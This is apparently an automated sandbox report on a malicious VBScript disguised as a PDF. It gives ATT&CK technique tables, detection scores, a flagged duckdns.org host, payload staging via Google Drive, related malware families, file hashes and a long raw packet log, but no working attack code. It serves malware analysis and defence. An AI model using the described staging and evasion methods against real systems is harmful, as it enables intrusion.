              Source: Yara match File source: 00000007.00000002.1905132291.0000000009B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | 221 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 221 Scripting | 111 Process Injection | 1 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Remote Access Software | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 111 Process Injection | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | 113 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              [Behavior Graph ID: 1523159, Sample: A 413736796#U00b7pdf.vbs, Startdate: 01/10/2024, Architecture: WINDOWS, Score: 100]

              Source | Detection | Scanner | Label
              A 413736796#U00b7pdf.vbs | 8% | ReversingLabs | Win32.Trojan.Generic
              A 413736796#U00b7pdf.vbs | 11% | Virustotal |
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label
              drive.google.com | 0% | Virustotal |
              drive.usercontent.google.com | 1% | Virustotal |
              Source | Detection | Scanner | Label
              http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
              http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
              http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
              https://aka.ms/pscore6lB | 0% | URL Reputation | safe
              https://go.micro | 0% | URL Reputation | safe
              https://contoso.com/ | 0% | URL Reputation | safe
              https://nuget.org/nuget.exe | 0% | URL Reputation | safe
              https://contoso.com/License | 0% | URL Reputation | safe
              https://contoso.com/Icon | 0% | URL Reputation | safe
              https://aka.ms/pscore68 | 0% | URL Reputation | safe
              https://apis.google.com | 0% | URL Reputation | safe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
              http://drive.usercontent.google.com | 1% | Virustotal |
              http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
              https://www.google.com | 0% | Virustotal |
              http://drive.google.com | 0% | Virustotal |
              https://github.com/Pester/Pester | 1% | Virustotal |
              a458386d9.duckdns.org | 14% | Virustotal |
              https://drive.google.com | 0% | Virustotal |
              https://drive.usercontent.google.com | 1% | Virustotal |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              drive.google.com | 172.217.16.206 | true | false | | unknown
              drive.usercontent.google.com | 142.250.184.193 | true | false | | unknown
              Name | Malicious | Antivirus Detection | Reputation
              a458386d9.duckdns.org | true | | unknown
                  IP | Domain | Country | ASN | ASN Name | Malicious
                  172.217.16.206 | drive.google.com | United States | 15169 | GOOGLEUS | false
                  142.250.184.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1523159
                  Start date and time:2024-10-01 07:44:51 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 18s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:15
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:A 413736796#U00b7pdf.vbs
                  renamed because original name is a hash value
                  Original Sample Name:A 413736796pdf.vbs
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winVBS@9/7@2/2
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 76%
                  • Number of executed functions: 45
                  • Number of non-executed functions: 5
                  Cookbook Comments:
                  • Found application associated with file extension: .vbs
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 7756 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 8088 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  Time | Type | Description
                  01:45:53 | API Interceptor | 88x Sleep call for process: powershell.exe modified
                  No context
                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  3b5074b1b5d032e5620f69f9f700ff0e | Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 172.217.16.206, 142.250.184.193
                  3b5074b1b5d032e5620f69f9f700ff0e | Scanned Purchase List.vbs | malicious | Unknown | 172.217.16.206, 142.250.184.193
                  3b5074b1b5d032e5620f69f9f700ff0e | SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 172.217.16.206, 142.250.184.193
                  3b5074b1b5d032e5620f69f9f700ff0e | Recibo de transferencia#U00b7pdf.vbs | malicious | Remcos, GuLoader | 172.217.16.206, 142.250.184.193
                  3b5074b1b5d032e5620f69f9f700ff0e | mtgjyX9gHF.exe | malicious | Quasar | 172.217.16.206, 142.250.184.193
                  3b5074b1b5d032e5620f69f9f700ff0e | PO_9876563647-FLOWTRONIX (FT)UUE.exe | malicious | AgentTesla | 172.217.16.206, 142.250.184.193
                  3b5074b1b5d032e5620f69f9f700ff0e | 2zYP8qOYmJ.exe | malicious | Unknown | 172.217.16.206, 142.250.184.193
                  3b5074b1b5d032e5620f69f9f700ff0e | RFQ-00032035.PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 172.217.16.206, 142.250.184.193
                  3b5074b1b5d032e5620f69f9f700ff0e | RFQ -SCHOTTEL Type SRP200.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 172.217.16.206, 142.250.184.193
                  3b5074b1b5d032e5620f69f9f700ff0e | Purchase Order 007823-PO# 005307.exe | malicious | Snake Keylogger, VIP Keylogger | 172.217.16.206, 142.250.184.193
                  37f463bf4616ecd445d4a1937da06e19 | Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 172.217.16.206, 142.250.184.193
                  37f463bf4616ecd445d4a1937da06e19 | SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 172.217.16.206, 142.250.184.193
                  37f463bf4616ecd445d4a1937da06e19 | Recibo de transferencia#U00b7pdf.vbs | malicious | Remcos, GuLoader | 172.217.16.206, 142.250.184.193
                  37f463bf4616ecd445d4a1937da06e19 | 6JA2YPtbeB.exe | malicious | LummaC, Stealc, Vidar | 172.217.16.206, 142.250.184.193
                  37f463bf4616ecd445d4a1937da06e19 | hTR7xY0d0V.exe | malicious | LummaC, Stealc, Vidar | 172.217.16.206, 142.250.184.193
                  37f463bf4616ecd445d4a1937da06e19 | N83LFtMTUS.exe | malicious | LummaC, Stealc, Vidar | 172.217.16.206, 142.250.184.193
                  37f463bf4616ecd445d4a1937da06e19 | Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exe | malicious | Remcos, GuLoader | 172.217.16.206, 142.250.184.193
                  37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LodaRAT | 172.217.16.206, 142.250.184.193
                  37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | XWorm, Xmrig | 172.217.16.206, 142.250.184.193
                  37f463bf4616ecd445d4a1937da06e19 | Payment Advice Note_Pdf.exe | malicious | Azorult, GuLoader | 172.217.16.206, 142.250.184.193
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:modified
                  Size (bytes):8003
                  Entropy (8bit):4.840877972214509
                  Encrypted:false
                  SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                  MD5:106D01F562D751E62B702803895E93E0
                  SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                  SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                  SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):1.1940658735648508
                  Encrypted:false
                  SSDEEP:3:Nlllultnxj:NllU
                  MD5:F93358E626551B46E6ED5A0A9D29BD51
                  SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                  SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                  SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:@...e................................................@..........
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:dropped
                  Size (bytes):418636
                  Entropy (8bit):5.969251071288385
                  Encrypted:false
                  SSDEEP:6144:S83XmAQyiygSjfGah8odhsdRbEmU8Dpc8hGVjlbcmxxfdxCNKH77kuXJc+:p3WAQyHfn8oIfQqxgVJbcwFxHMC
                  MD5:CE86E8EBFB09204B1B79EDD6B0BA0AEE
                  SHA1:4D94C2433116295B08B1ACF3A693A9BD87B8D12B
                  SHA-256:1A4A1635D110E2F9F279138FCEEA9A3FC724E62AC91C199A83338C51053A450E
                  SHA-512:C20EA924DED0AD9C6CEF417396DF2C1BB9EA1D14F60F56D30C2A41F08FF60895E9E82FA8CD7C5CFB3934ACF138BAC7EB561027E4E9E46DD4711E6AFF49606F5D
                  Malicious:false
                  File type:ASCII text, with CRLF line terminators
                  Entropy (8bit):4.88426388982442
                  TrID:
                  • Visual Basic Script (13500/0) 100.00%
                  File name:A 413736796#U00b7pdf.vbs
                  File size:75'008 bytes
                  MD5:3f5e0a8b0d1ac0143d359bcb63171066
                  SHA1:7f6368b52a021340768f61ae047d88c7e6d4add3
                  SHA256:8da5ed79da8da8c5521a238f05bb61bd1e48c59fab0bee7758fc11c163142396
                  SHA512:a2a351604fd741bdb95f74836aad27de590eb96857413da9187071c37cc6efd5b261057cd6bec5b4df94d9dc61d3179d4a8a37a4e23b0d5279ba254e83b3f5b3
                  SSDEEP:1536:sC1DjneW/+yAxEfH8YQO2+VjuNaU7CGTE4+6GDoQVYf:sC1v/3A+fRVji7CW9dGGf
                  TLSH:D973B210B8F4263DC9610E98BD4F370484798D1BC22DBBA8E5CD0ABF3F9146CB67A156
                  File Content Preview:..Rem Omohyoid? stromata? signficance debasingly!..Rem Serbantian? dimers.....Rem Trapperummet smaskede conhydrine! midterfigurernes vav..Rem Zamorine unbalanceable, navnetypes2 kunsthandler? forbiddingness:..Rem Pullers reuter: apperceptionism: effektivi
                  Icon Hash:68d69b8f86ab9a86
                  Timestamp:2024-10-01T07:46:28.837001+0200
                  SID:2803270
                  Signature:ETPRO MALWARE Common Downloader Header Pattern UHCa
                  Severity:2
                  Source IP:192.168.2.8
                  Source Port:49708
                  Dest IP:172.217.16.206
                  Dest Port:443
                  Protocol:TCP
                  Oct 1, 2024 07:45:58.841943979 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.841984034 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.842042923 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.842067003 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.842070103 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.842082024 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.842082977 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.842114925 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.842122078 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.842153072 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.842191935 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.842197895 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.848201990 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.848227024 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.848300934 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.848308086 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.848341942 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.848341942 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.848361969 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.848402977 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.854265928 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.854363918 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.854392052 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.854412079 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.854418039 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.854429007 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.854454041 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.860353947 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.860385895 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.860414028 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.860441923 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.860446930 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.860459089 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.860480070 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.860496044 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.860498905 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.860507011 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.860552073 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.866163015 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.866213083 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.866239071 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.866255045 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.866265059 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.866300106 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.866302967 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.866312027 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.866353989 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.869919062 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.870052099 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.870078087 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.870095968 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.870101929 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.870127916 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.870140076 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.870146036 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.870187998 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.875873089 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.875931978 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.875962019 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.875976086 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.875993967 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.876019955 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.876030922 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.876039982 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.876079082 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.881088018 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.881189108 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.881218910 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.881243944 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.881244898 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.881257057 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.881282091 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.886539936 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.886568069 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.886579990 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.886589050 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.886615992 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.886631012 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.886636972 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.886673927 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.886679888 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.891742945 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.891788006 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.891813040 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.891822100 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.891866922 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.891885996 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.891933918 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.891957998 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.891993046 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.891999960 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.892055035 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.898833990 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.898947954 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.898976088 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.898988962 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.898997068 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.899022102 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.899028063 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.899034977 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.899075031 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.902093887 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.902137041 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.902187109 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.902193069 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.902232885 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.902268887 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.902273893 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.906418085 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.906444073 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.906524897 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.906533003 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.906542063 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.906563997 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.906575918 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.906603098 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.906687021 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.906692982 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.906745911 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.910505056 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.910553932 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.910578966 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.910600901 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.910603046 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.910615921 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.910643101 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.915250063 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.915318012 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.915323973 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.915330887 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.915369987 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.915371895 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.915389061 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.915431023 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.915436983 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.922041893 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.922075987 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.922105074 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.922113895 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.922151089 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.922161102 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.922203064 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.922235966 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.922240973 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.928198099 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.928272009 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.928282022 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.928350925 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.928392887 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.963716030 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:27.542171001 CEST49708443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:46:27.542231083 CEST44349708172.217.16.206192.168.2.8
                  Oct 1, 2024 07:46:27.542296886 CEST49708443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:46:27.552037001 CEST49708443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:46:27.552071095 CEST44349708172.217.16.206192.168.2.8
                  Oct 1, 2024 07:46:28.432341099 CEST44349708172.217.16.206192.168.2.8
                  Oct 1, 2024 07:46:28.432436943 CEST49708443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:46:28.433120966 CEST44349708172.217.16.206192.168.2.8
                  Oct 1, 2024 07:46:28.433279037 CEST49708443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:46:28.493686914 CEST49708443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:46:28.493721962 CEST44349708172.217.16.206192.168.2.8
                  Oct 1, 2024 07:46:28.494112015 CEST44349708172.217.16.206192.168.2.8
                  Oct 1, 2024 07:46:28.494198084 CEST49708443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:46:28.497561932 CEST49708443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:46:28.543407917 CEST44349708172.217.16.206192.168.2.8
